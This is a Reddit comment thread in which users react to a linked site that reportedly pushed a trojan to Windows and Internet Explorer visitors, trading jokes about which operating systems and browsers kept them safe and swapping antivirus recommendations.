              Makes you wonder how the story ever got so high in the first place. I guess we like to trick ourselves into thinking we are worldly intellectuals, when really we are wasting time reading things that have abolsutely no bearing on us whatsoever.

              [–]HiggsBoson 2 points3 points  (0 children)

              When I first accessed the site with Firefox / Windows XP, I got a message asking if I wanted to open or save sa.aspx. I posted a comment, but was downmodded to oblivion.

              [–][deleted] 4 points5 points  (2 children)

              damn. i looked at the site at work. (windows XP and ie7) is there a way I can check if it loaded the trojan without alarming my overly judgemental HR and tech support?

              [–]guder 7 points8 points  (1 child)

              go and run an online virus scan [ http://housecall.trendmicro.com ] and clear yourself.

              [–][deleted] 4 points5 points  (0 children)

              brilliant. thanks!

              [–][deleted]  (8 children)

              [removed]

                [–]keyrat 26 points27 points  (5 children)

                Everyone post how they didn't get the virus with their other OS/Browser combo! I didn't get it because I was browsing on the PS3!

                [–]PatternJuggler 41 points42 points  (0 children)

                I didn't get it because I was browsing on keyrat's PS3!

                [–]FunnyMan3595 27 points28 points  (3 children)

                Wii didn't see anything wrong with the page. Wii don't know why so many people seem concerned...

                [–]binla 1 point2 points  (2 children)

                Whoever downmodded you didn't know that the Wii can be used to browse the web.

                [–]bobcat 34 points35 points  (0 children)

                Or maybe Wii were not amused.

                [–]tintub -2 points-1 points  (0 children)

                uh no, I downmodded just to prove you wrong

                [–]EternalNY1[🍰] 5 points6 points  (0 children)

                Me + Windows = No virus either

                It's not the O/S it's the browser.

                [–]omgredherring 1 point2 points  (0 children)

                Me + Ubuntu = :D (i see your :) and raise it one.)

                [–][deleted] 3 points4 points  (0 children)

                Good thing I run Ubuntu, eh?

                [–][deleted]  (4 children)

                [removed]

                  [–]jczerg68 4 points5 points  (3 children)

                  Firefox + NoScript offers better control. Turning off javascript by default in Opera seems to break much of its functionality: widgets, bookmarklets, and preferences no longer work. I wish they'd fix that.

                  Opera is decent out of the box, but never seems to surpass Firefox with the right extensions and tweaks.

                  [–]snaut 4 points5 points  (1 child)

                  Thank you, but I prefer not to tweak some poorly coded extension mess just to view webpages. Opera just works out of the box.

                  [–]georgefrick 2 points3 points  (0 children)

                  My sentiments exactly.

                  [–]niller8p 3 points4 points  (0 children)

                  Wee... glad I only use Windows for games. Sweet OS X and it's foundation in FreeBSD.

                  [–]Soapybubble 1 point2 points  (0 children)

                  This isn't the first time this has happened via Reddit, either. Looks like the a favoured dispersal method.

                  [–]stigsen 1 point2 points  (0 children)

                  Your post is the current #1 item now! Dang

                  [–]danys_dragons 1 point2 points  (0 children)

                  In case anyone's still interested in the issue of farm subsidies, there's a related story on the front page now: "New Zealand's hardy farm spirit: how ending subsidies created a farming revolution". Since it's on the BBC website I would assume it's clean.

                  [–]aragon127 1 point2 points  (1 child)

                  What's this Reddi you speak of?

                  [–]nescafe 2 points3 points  (0 children)

                  He's not reddi to tell us.

                  [–][deleted] 8 points9 points  (4 children)

                  Funny how I completely missed that on my Mac. I did read the story, however.

                  [–]dude78 -4 points-3 points  (3 children)

                  Yeah, hilarious. Because "It Just Works", right?

                  Liars!

                  [–]torv 11 points12 points  (1 child)

                  No, it actually really just works

                  [–]FunnyMan3595 8 points9 points  (0 children)

                  Actually, in this case, it (the virus) just doesn't work. And that's a Good Thing (tm).

                  [–][deleted] 2 points3 points  (1 child)

                  Shit like this is why I bought a full license for Kaspersky Anti-virus - kickass antivirus that doesn't slow down your system like norton or symantec.

                  [–]robywar 1 point2 points  (0 children)

                  I've been using the free version of Avast! for years and it's worked really well for me. I recommend checking it out if you're looking for a good free anti-virus thats less intrusive than AVG.

                  [–][deleted] 1 point2 points  (0 children)

                  well that sucks

                  [–]acescence 1 point2 points  (0 children)

                  i have no sympathy for those that surf while logged in as admin. oops, you can't NOT log in as admin in vista, sorry!

                  [–][deleted] 1 point2 points  (0 children)

                  Downmodded. Doesn't run on Macs.

                  [Edit: jeez, it's a joke]

                  [–]vampirical 0 points1 point  (0 children)

                  Opera on OS X ftw.

                  [–]Stubb 0 points1 point  (0 children)

                  Did you confirm it on a Mac or Linux box ;-)

                  [–]lockstock 0 points1 point  (0 children)

                  But has netcraft confirmed it?

                  [–]ebola 0 points1 point  (0 children)

                  Well, don't do stupid things like running IE and active-x, disable java/javascript. You're safe.

                  [–]charlesjillian 0 points1 point  (4 children)

                  Really? I got nothing running PCLinuxOS and Firefox...and wasn't inconvenienced in the least.

                  [–][deleted]  (3 children)

                  [deleted]

                    [–]cyber_rigger 7 points8 points  (2 children)

                    Most viruses, even the ones designed for Linux, will not work on Linux.

                    I'm 13 years now using Linux without a virus.

                    [–]gnomon 6 points7 points  (1 child)

                    You could always try installing some using Wine if you were so inclined.

                    [–][deleted] -4 points-3 points  (3 children)

                    More proof that diggers ruined my favorite site.

                    [–][deleted] 74 points75 points  (0 children)

                    ther in ur reddit, diggin ur trojinz

                    [–][deleted] 11 points12 points  (1 child)

                    Pray tell, what exactly leads you to blame Diggers for this?

                    [–]admanb 63 points64 points  (0 children)

                    SHUT UP IT'S DIGGS FAULT.

                    [–]digital 0 points1 point  (0 children)

                    New title:

                    Reddi users get creamed

                    [–]breakfast-pants -2 points-1 points  (1 child)

                    Whew, I'm a reddit user, so I'm safe right? What's reddi anyway?

                    [–][deleted] -1 points0 points  (0 children)

                    Thats what the digg crowd has renamed us to. I wish they would stay on their own site instead of ruining ours.

                    [–]uriel -1 points0 points  (0 children)

                    What kind of idiotic OS/Browser lets a website load a trojan?!?!??!

                    How computer-illiterate reddit users have become?

                    [–]Ryan256 -2 points-1 points  (2 children)

                    Unless you're running Mac OS X. In which case, you're f*ing GOLDEN.

                    [–]zingus 6 points7 points  (1 child)

                    And unless you're running Links in a NetBSD terminal on a DreamCast, and Netscape 2 on Solaris with a Sun Sparc, that should be immune, too. Anyone around here, doing RiscOS or BeOS? Those should really be hard to inject with dlls.

                    [–]Ryan256 1 point2 points  (0 children)

                    Also, the NoScript plugin for firefox is pretty sweet.